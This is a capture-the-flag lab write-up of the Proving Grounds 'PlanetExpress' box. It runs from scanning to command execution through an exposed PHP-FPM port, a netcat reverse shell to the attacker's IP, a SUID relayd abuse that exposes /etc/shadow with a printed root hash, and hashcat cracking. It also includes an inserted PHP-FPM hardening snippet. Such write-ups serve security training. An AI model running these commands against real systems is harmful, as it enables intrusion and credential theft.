Proving grounds: PlanetExpress

Al1z4deh:~# echo "Welcome"
Dec 6, 2022

Today we will take a look at Proving grounds: PlanetExpress. My purpose in sharing this post is to prepare for the OSCP exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: Pico CMS
|_http-title: PlanetExpress — Coming Soon !
|_http-server-header: Apache/2.4.38 (Debian)
9000/tcp open cslistener?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Pico (80)
gobuster dir -u http://192.168.168.205 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

/config (Status: 301) [Size: 319] [--> http://192.168.168.205/config/]
ffuf -u http://192.168.168.205/config/FUZZ -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -fw 20

/config.yml [Status: 200, Size: 812, Words: 96, Lines: 60, Duration: 413ms]
# Plugins: https://github.com/picocms/Pico/tree/master/plugins
#
plugins_url: ~
DummyPlugin.enabled: false

PicoOutput:
  formats: [content, raw, json]

##
# Self developed plugin for PlanetExpress
#
#PicoTest:
#  enabled: true

http://192.168.168.205/plugins/PicoTest.php

  • cslistener (9000)
└─# python fpm.py -c "<?php passthru('id'); ?>" -p 9000 192.168.168.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10
Content-type: text/html; charset=UTF-8

uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
Exception ignored in: <_io.TextIOWrapper name='<stdout>' mode='w' encoding='utf-8'>
BrokenPipeError: [Errno 32] Broken pipe

Reverse shell

python fpm.py -c "<?php passthru('nc 192.168.49.168 80 -e /bin/bash'); ?>" -p 9000 192.168.168.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10
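The foothold above only works because PHP-FPM accepts FastCGI connections from any host that can reach tcp/9000. As an added defender's note (not part of the original post), here is the pool setting that exposes it next to the restricted form; the pool file path and the PHP 7.3 version are assumptions based on the Debian 10 banner in the scan:

```ini
; /etc/php/7.3/fpm/pool.d/www.conf  (path and version assumed, not from the post)

; Weak: binds every interface, so any host that can reach tcp/9000 can
; hand this pool a FastCGI request and have PHP executed as www-data.
; listen = 0.0.0.0:9000

; Restricted: only the local web server can reach the pool.
listen = 127.0.0.1:9000
; Even on loopback, accept only these FastCGI clients (TCP listeners only).
listen.allowed_clients = 127.0.0.1

; Alternative: a Unix socket, so access is governed by file permissions
; rather than by which interface the port is bound to.
; listen = /run/php/php7.3-fpm.sock
; listen.owner = www-data
; listen.group = www-data
; listen.mode = 0660

; Refuse to run anything that is not a .php file, whatever SCRIPT_FILENAME
; a client points at.
security.limit_extensions = .php
```

After the change, the port should no longer appear in an external scan, and a local `ss -ltnp` should show 9000 bound to 127.0.0.1 only.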
  • Privesc (relayd)
find / -user root -perm -4000 -exec ls -ldb {} \; 2> /dev/null

-rws---r-x 1 root root 3644754 Jan 10 2022 /usr/sbin/relayd
www-data@planetexpress:~/html/planetexpress/plugins$ ls -l /etc/passwd   
-rw-r--r-- 1 root root 1385 Jan 10 2022 /etc/passwd
www-data@planetexpress:~/html/planetexpress/plugins$ ls -l /etc/shadow
-rw-r----- 1 root shadow 940 Jan 10 2022 /etc/shadow
www-data@planetexpress:~/html/planetexpress/plugins$ /usr/sbin/relayd -C /etc/shadow
[ERR] 2022-12-06 12:10:29 config.cpp:1539 write
[ERR] 2022-12-06 12:10:29 config.cpp:1213 open failed [/usr/etc/relayd/misc.conf.tmp.12217]
[ERR] 2022-12-06 12:10:29 config.cpp:1189 bad json format [/etc/shadow]
www-data@planetexpress:~/html/planetexpress/plugins$ ls -l /etc/shadow
-rw-r--r-- 1 root shadow 940 Jan 10 2022 /etc/shadow
www-data@planetexpress:~/html/planetexpress/plugins$ cat /etc/shadow
root:$6$vkAzDkveIBc6PmO1$y8QyGSMqJEUxsDfdsX3nL5GsW7p/1mn5pmfz66RBn.jd7gONn0vC3xf8ga33/Fq57xMuqMquhB9MoTRpTTHVO1:19003:0:99999:7:::
  • Hashcat
hashcat.exe -m 1800 -a 0 hash.txt rockyou.txt
www-data@planetexpress:~$ su root
Password:
root@planetexpress:/var/www# whoami
root
root@planetexpress:/var/www# id
uid=0(root) gid=0(root) groups=0(root)

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
